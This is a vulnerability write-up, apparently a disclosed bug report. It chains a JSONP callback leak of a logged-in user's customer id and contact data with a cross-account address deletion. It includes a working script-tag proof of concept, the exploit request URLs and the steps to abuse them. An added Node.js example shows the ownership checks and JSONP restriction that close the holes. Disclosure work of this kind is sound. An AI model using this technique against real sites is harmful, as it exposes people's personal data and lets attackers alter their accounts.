1. First I found the endpoint of the website that leaked the user id. Response:
jQuery111308705583230454748_1548063320659({"responseCode":"200","responseDesc":"success","responseData":{"cust":{"customerGuid":"df73d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"YongShao","gender":2,"country":"CN","countryName":"China","province":"CN-12","provinceName":"****","city":"CN-12-001","cityName":"****","telephone":"1***********","email":""}}})
Then I constructed a JSONP PoC to get the victim's id:
<script>function jQuery111308705583230454748_1548063320659(d) {alert(d['responseData']['cust']['customerGuid']);}</script><script type="text/javascript" src="https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getServiceCust/1000?jsonp=jQuery111308705583230454748_1548063320659&accountId=&source=100000007&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&language=zh-cn&siteCode=zh_CN&_=1548063320660"></script>
Got it.
2. Then I found that I could splice this id into another request to get the user's address id:
https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getContactList/1000?jsonp=jQuery111308705583230454748_1548063320661&source=100000007&customerGuid=df73d476-5f1d-e911-80ff-*******&language=zh-cn&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&siteCode=zh_CN&_=1548063320667
response:
jQuery111308705583230454748_1548063320661({"responseData":{"list":[{"customerGuid":"df73d476-5f1d-e911-80ff-******","contactAddressId":"e973d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"tset","country":"CN","province":"CN-12","city":"CN-12-001","district":"CN-12-001-02","isDefault":"N","createdon":"2019-01-21 03:45:04","countryName":"China","provinceName":"*****","cityName":"*****","districtName":"***","telephone":"131********","postCode":"","address":"*****"}]},"responseCode":"200","responseDesc":"success"})
The contactAddressId parameter identifies the address.
3. Try to use this information to delete the address from account B.
Open the developer tools (F12) and find the delete button:
<a data-contactaddressid="e973d476-5f1d-e911-80ff-******" class="delete-btn under-line" href="javascript:;">Del</a>
Then return to account A to confirm whether the deletion succeeded, observing through the JSONP interface.
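The server-side checks whose absence enabled the two steps above, as an added example in Node.js that is not the vulnerable site's code: the contact list and the delete are keyed to the session's customerGuid rather than to a query parameter, and customer data is never wrapped in a JSONP callback. The store, ids and response codes are constructed.

```javascript
// Added example, not the vulnerable site's code. Constructed sample store.
const contacts = new Map([
  ["addr-a-1", { customerGuid: "cust-a", fullName: "tset", isDefault: "Y" }],
  ["addr-b-1", { customerGuid: "cust-b", fullName: "other", isDefault: "N" }],
]);

// `session` is what the authenticated cookie resolves to on the server.
// The customerGuid in the URL (step 2 above) is ignored entirely.
function getContactList(session) {
  const list = [];
  for (const [contactAddressId, entry] of contacts) {
    if (entry.customerGuid === session.customerGuid) {
      list.push({ contactAddressId, ...entry });
    }
  }
  return { responseCode: "200", responseDesc: "success", responseData: { list } };
}

// Ownership check that closes the cross-account delete (step 3 above).
function deleteContactAddress(session, contactAddressId) {
  const entry = contacts.get(contactAddressId);
  // "Not found" and "not yours" get the same answer so the id space
  // cannot be probed for other customers' addresses.
  if (!entry || entry.customerGuid !== session.customerGuid) {
    return { responseCode: "403", responseDesc: "forbidden" };
  }
  contacts.delete(contactAddressId);
  return { responseCode: "200", responseDesc: "success" };
}

// Authenticated customer data must never be served as JSONP: a <script src>
// from any origin is sent with the victim's cookies (step 1 above). JSONP is
// kept only for non-sensitive payloads, and the callback must be a plain
// identifier so the reflected name cannot carry script.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,80}$/;
function renderResponse(callbackName, payload, containsCustomerData) {
  const body = JSON.stringify(payload);
  if (!callbackName) return { contentType: "application/json", body };
  if (containsCustomerData || !CALLBACK_RE.test(callbackName)) {
    const err = { responseCode: "400", responseDesc: "jsonp not allowed" };
    return { contentType: "application/json", body: JSON.stringify(err) };
  }
  return { contentType: "application/javascript", body: `${callbackName}(${body})` };
}
```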
Timeline
2019.01.21 Reported the vulnerability
2019.01.22 Vulnerability received and forwarded for processing
……(I don't know when it was fixed.)
2019.02.19 Published this article
This article was first published on the WeChat official account (逢人斗智斗勇): Jsonp+Excessive deletion Vul